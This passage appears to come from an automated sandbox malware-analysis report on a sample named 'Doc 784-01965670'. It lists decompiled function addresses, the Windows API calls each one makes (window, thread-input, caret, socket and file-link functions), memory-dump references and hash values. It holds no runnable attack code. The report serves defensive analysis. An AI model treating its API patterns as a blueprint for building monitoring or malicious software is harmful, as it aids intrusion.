                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3058430110-0
                                                                                                                                    • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                    • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                                                                    • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                                                                    • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                                                                    Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                    • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                    • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                    • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                    • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                    Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 004505BF
                                                                                                                                    • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                    • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Proc$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2351499541-0
                                                                                                                                    • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                    • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                    • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                    • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                    Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                    • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                    • __itow.LIBCMT ref: 00461461
                                                                                                                                    • __itow.LIBCMT ref: 004614AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$__itow$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2875217250-0
                                                                                                                                    • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                    • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                    • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                    • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                    Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                      • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                      • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                      • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                    • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                    • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                    • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                    • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                                    • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                    • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                                    Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                    • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                    • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                    • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                    • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                    Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 312131281-0
                                                                                                                                    • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                    • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                    • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                    • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                    Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • select.WSOCK32 ref: 0045890A
                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastacceptselect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 385091864-0
                                                                                                                                    • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                    • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                    • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                    • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                    Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                    • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                    • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                    • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                    Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1358664141-0
                                                                                                                                    • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                    • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                    • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                    • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                                    Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                    • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                    • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                    • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                    • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                    Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                    • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                    • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                    • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                    • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                    • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                                    Function 00424E33 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction ID: 11ead64bc5c18606fe5fffcedc2bbdf89ccfa4faa7bd693ca83be0ddd2add3a5
                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                    • Instruction Fuzzy Hash: AA11A272500059BBCF225E85EC018EE3F66FB88354B898416FE2858131C73AC9B1AB85
                                                                                                                                    Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1187119602-0
                                                                                                                                    • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                    • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                                    • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                    • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                                    Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1597257046-0
